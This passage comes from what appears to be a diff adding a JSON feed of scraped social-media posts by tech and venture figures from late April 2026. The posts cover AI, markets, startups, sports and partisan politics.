"2026-04-26T22:50:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Many such cases.", + "url": "https://nitter.net/pmarca/status/2048515643268567431#m", + "published_at": "2026-04-26T21:32:43+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m", + "published_at": "2026-04-26T21:21:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m", + "published_at": "2026-04-26T17:27:34+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?", + "url": "https://nitter.net/KonstantinKisin/status/2048448438715445382#m", + "published_at": "2026-04-26T17:05:40+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", + "url": "https://nitter.net/charliebilello/status/2048436641451155650#m", + "published_at": "2026-04-26T16:18:48+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://nitter.net/RobertMSterling/status/2048435593244237849#m", + "published_at": "2026-04-26T16:14:38+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If they’re willing to die to assassinate, imagine what they will do if they gain political power", + "url": "https://nitter.net/elonmusk/status/2048428921536868583#m", + "published_at": "2026-04-26T15:48:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed", + "url": "https://nitter.net/SpaceX/status/2048427420366324024#m", + "published_at": "2026-04-26T15:42:09+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://nitter.net/charliebilello/status/2048419415222259820#m", + "published_at": "2026-04-26T15:10:21+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://nitter.net/charliebilello/status/2048406550897729561#m", + "published_at": "2026-04-26T14:19:13+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://nitter.net/charliebilello/status/2048401720540061794#m", + "published_at": "2026-04-26T14:00:02+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", + "url": "https://nitter.net/charliebilello/status/2048397937156518387#m", + "published_at": "2026-04-26T13:45:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", + "url": "https://nitter.net/charliebilello/status/2048394162366533935#m", + "published_at": "2026-04-26T13:30:00+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", + "url": "https://nitter.net/charliebilello/status/2048390341221404827#m", + "published_at": "2026-04-26T13:14:49+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "published_at": "2026-04-26T13:13:50+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://nitter.net/paulg/status/2048370801833828507#m", + "published_at": "2026-04-26T11:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Yeah", + "url": "https://nitter.net/elonmusk/status/2048271866914083172#m", + "published_at": "2026-04-26T05:24:02+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://nitter.net/Jason/status/2048245718171648271#m", + "published_at": "2026-04-26T03:40:08+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://nitter.net/Jason/status/2048151434928017429#m", + "published_at": "2026-04-25T21:25:29+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: New video is up: \n\n📈The Week in Charts - breaking down the most important charts and themes in markets...\n\nhttps://www.youtube.com/watch?v=p5e0ThPjIAg", + "url": "https://nitter.net/charliebilello/status/2048128721286992166#m", + "published_at": "2026-04-25T19:55:14+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://nitter.net/Jason/status/2048116521436590260#m", + "published_at": "2026-04-25T19:06:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://nitter.net/Jason/status/2048116362766127514#m", + "published_at": "2026-04-25T19:06:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a good thing. Let a thousand flowers bloom.”\n\nPlus:\n\n💰 Was the NYT wrong to host a discussion about “micro-looting”?\n\n🪖 A Special Forces soldier was insider trading on Polymarket… does it matter who he bet on?\n\n💵 Why rich families teach their kids about finance but public schools don’t.\n\nIt’s a TWiST Saturday special!\n\n0:00 Intro\n1:18 Naval's $500 VC Fund Explained\n5:54 Should You Trust Critics With 2K Followers?\n7:21 Learn By Betting — Jason's Philosophy\n10:10 Northwest Registered Agent - Get more when you start your business with Northwest. In 10 clicks and 10 minutes, you can form your company and walk away with a real business identity — Learn more at https://www.northwestregisteredagent.com/twist\n12:30 The Maduro Polymarket Scandal\n13:28 Should the Military Bet on Missions?\n19:55 LinkedIn Jobs - Hire right, the first time. Post your first job and get $100 off towards your job post at https://LinkedIn.com/twist\n29:32 NYT Defends Theft & \"Social Murder\"\n30:28 There Is No Moral Equivalence\n33:41 The Nepo Baby Behind the Article\n35:42 Prof G's \"Resist & Unsubscribe\" Movement\n37:54 Walk The Walk — Hasan, Bernie & Performative Outrage\n44:49 Teaching Kids About Money\n48:21 The Rich Get Richer & The Poor Stay Poor\n49:31 Outro\n\ncc: @Jason, @Lons, @AngelList, @Naval, @Polymarket, @nytimes\n\n🎥 Watch the full episode here 👇", + "url": "https://nitter.net/twistartups/status/2048099001782985057#m", + "published_at": "2026-04-25T17:57:08+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️\n\nBut over 470,000 pages were already preserved.\n\nThat history didn’t disappear.\nIt was archived.\n\n📚 Read VANISHING CULTURE to see why it matters\n📖 Download & read: https://archive.org/details/vanishing-culture-2026\n🛒 Purchase in print: https://www.betterworldbooks.com/product/detail/vanishing-culture-a-report-on-our-fragile-cultural-record-9798995425014/new\n\n#VanishingCulture #DigitalMemory #InternetArchive #MTVNews #BookTwitter", + "url": "https://nitter.net/internetarchive/status/2048069805807128734#m", + "published_at": "2026-04-25T16:01:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "5.5 is so earnest\n\n\"little engine that could\" energy", + "url": "https://nitter.net/sama/status/2048062261584077149#m", + "published_at": "2026-04-25T15:31:08+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Journalists worldwide should stand up for colleagues who are murdered.", + "url": "https://nitter.net/NickKristof/status/2048043843690561556#m", + "published_at": "2026-04-25T14:17:57+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI\n\nFrom David Sacks\n\n\"Historically we only had two good exits for software businesses. One was IPO. The other was M&A. Then these big private equity shops came along and gave us a third potential exit. You would sell to them and then they would raise the capital based on one third equity and two third debt. So it was debt financed buyouts. \n\nIt is something that has been around in the non technology part of the economy for a long time but was a relatively new entrant in the world of technology. And the reason for that is if you have debt financed a purchase, you need to have very stable cash flows. \n\nBecause if you miss and you cant pay your interest on the debt, you will lose all your equity because the debt holders will foreclose. \n\nIt was belief for a long time that software did have predictable cash flows, at least for the mature businesses.\"", + "url": "https://nitter.net/BoringBiz_/status/2048037985765949537#m", + "published_at": "2026-04-25T13:54:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: \"No one has ever been a success betting against America since 1776 — and they're not going to be a success in the future doing it, either.\" – Warren Buffett", + "url": "https://nitter.net/PeterMallouk/status/2048032027513864212#m", + "published_at": "2026-04-25T13:31:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Edith and Shahed from Noora Health came to visit. They've saved over 75,000 lives so far. A small city of people.", + "url": "https://nitter.net/paulg/status/2048024967996993760#m", + "published_at": "2026-04-25T13:02:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Here's YC's official advice about being truthful and precise about what is pilot, bookings, revenue and recurring revenue. \n\nFounders, particularly first time founders, need to sear this into their brains. Don't mistake one tier for another. Be precise, and always be truthful.", + "url": "https://nitter.net/garrytan/status/2048017824895909901#m", + "published_at": "2026-04-25T12:34:34+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Whoah, self-driving cars compete with airlines. I never considered that till now.", + "url": 